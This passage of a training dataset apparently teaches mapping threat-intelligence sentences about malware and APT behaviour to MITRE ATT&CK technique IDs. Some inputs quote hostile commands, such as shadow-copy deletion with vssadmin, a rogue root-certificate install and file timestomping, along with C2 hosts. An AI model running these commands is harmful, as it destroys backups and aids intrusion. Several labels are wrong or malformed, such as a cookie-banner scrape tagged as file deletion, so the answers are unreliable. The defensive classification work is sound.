- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT19 HTTP malware variant establishes persistence by setting the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT can maintain persistence by creating an auto-run Registry key"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then uses WebDAV to upload to a Box cloud drive."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deobfuscates its strings and APIs once its executed."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT is able to open a remote shell to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been delivered through compromised sites acting as watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key “\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56″"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX allows actors to spawn a reverse shell on a victim."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function.Then it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can create a registry key using wdigest."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper installs the backdoor, sets its attributes to “hidden”, and sets a random file date and time When the dropper installs the backdoor, it sets its attributes to “hidden” and sets file date and time to random values using the touch command: touch –t YYMMDDMM “/path/filename” > /dev/null"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1001 - Data Obfuscation', 'T1588.001 - Malware', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the following commands after exploiting a machine with malware to obtain information about files and directories: dir c:\\ >> %temp%\\download dir \"c:\\Documents and Settings\" >> %temp%\\download dir \"c:\\Program Files\\\" >> %temp%\\download dir d:\\ >> %temp%\\download"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has dumped credentials from victims. Specifically, the group has used the tool GET5 Penetrator to look for remote login and hard-coded credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have gathered three samples of the default loader associated with this group and extracted the following configurations: SHA256 of Sample Configuration 82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 LAUNCHER_ARGS=[‘–host’, ‘www1.chrome-up[.]date:4443’, ‘-t’, ‘obfs3’] db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f LAUNCHER_ARGS=[‘–host’, ‘www1.chrome-up[.]date:4443’, ‘-t’, ‘obfs3’] 7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 LAUNCHER_ARGS=[‘–host’, ‘139.59.46[.]154:3543’, ‘-t’, ‘obfs3’] These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1102 - Web Service', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has downloaded additional lateral movement scripts from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The core Karagany implant does not delete any of the plugins it downloads, although some of the plugins are designed to self-delete. This oversight facilitates high-fidelity forensic analysis of the majority of plugin activity carried out over the duration of the intrusion and allows a detailed timeline of threat actor activity to be compiled. The malware also creates a directory that is used for storing both plugin output data and to stage data for exfiltration. The ascending numerical value of these directories likely indicates malware versioning"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to automate SQL injection."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server. It has also obfuscated its C2 traffic as normal traffic to sites such as Github."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox has used the .PNG file format for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has used VBS scripts as well as embedded macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHTRACK aggregates collected data in a tmp file."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has scanned specific lists of target IP addresses."
- },
- {
- "role": "assistant",
- "content": "T1595.001 - Scanning IP Blocks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has the capability to gather the IP address from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid – using the AES and RSA algorithms"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our initial discovery of GravityRAT was through a malicious Word document. We were able to discover four distinct versions of GravityRAT, developed over two years"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can check the Registry for specific keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook contains keylogging capabilities."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers system information, network addresses, disk type, disk free space, and the operation system version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "finds a specified directory, lists the files and metadata about those files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used Powershell to discover email accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can enumerate windows and child windows on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can check for the presence of ESET and Kaspersky security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk has the ability to delete shadow volumes using \"vssadmin.exe delete shadows /all /quiet\"."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot injects into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command \"add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename\"."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens uses ZPP, a .NET console program, to compress files with ZIP."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 channel uses an 11-byte XOR algorithm to hide data."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4)"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear) . Every IR presents unique challenges. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it. RAR) included deleted items in Accessed Files STEALTHYATTACKER FUN FACT: Now it’s built-in. DERBYCON 2016 #NOEASYBREACH Matt Dunwoody @matthewdunwoody Nick Carr @itsreallynick 22 likes . Views . You have now unlocked unlimited access to 20M+ documents. Unlimited Reading . Learn faster and smarter from top experts . Unlimited Downloading . Download to take your learnings offline and on the go . You also get free access to Scribd. Instant access to millions of ebooks, audiobooks, magazines, podcasts and more. Free access to premium services like Tuneln, Mubi and more. Enjoy access to millions of ebooks, audiobooks, magazines, and more from Scribd"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT can query service configuration information."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches attached and mounted drives for file extensions and keywords that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment/link and is tricked into clicking “Enable content”. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex's strings are obfuscated using RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may gather a list of running processes by running tasklist /v."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has deleted accounts it has created."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Timeline . OSX/FruitFly: 1) 2) Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy who's address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p commandline flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started everytime the infected system is rebooted. MacRansom is the the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save for a perhaps a brute force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used remote access tools that leverage DNS in communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 obtained a list of users and their roles from an Exchange server using \"Get-ManagementRoleAssignment\"."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang gathered information and files from local directories for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can bypass UAC to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "4H RAT has the capability to obtain a listing of running processes (including loaded modules)."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The information gathered is added to a string in the following structure: |||||||<“hybrid” mode flag from config>|| The payload will base64 encode this string and use its DNS tunneling protocol to transmit the data to the C2"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has used WMI to execute powershell.exe."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has gathered information about running services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
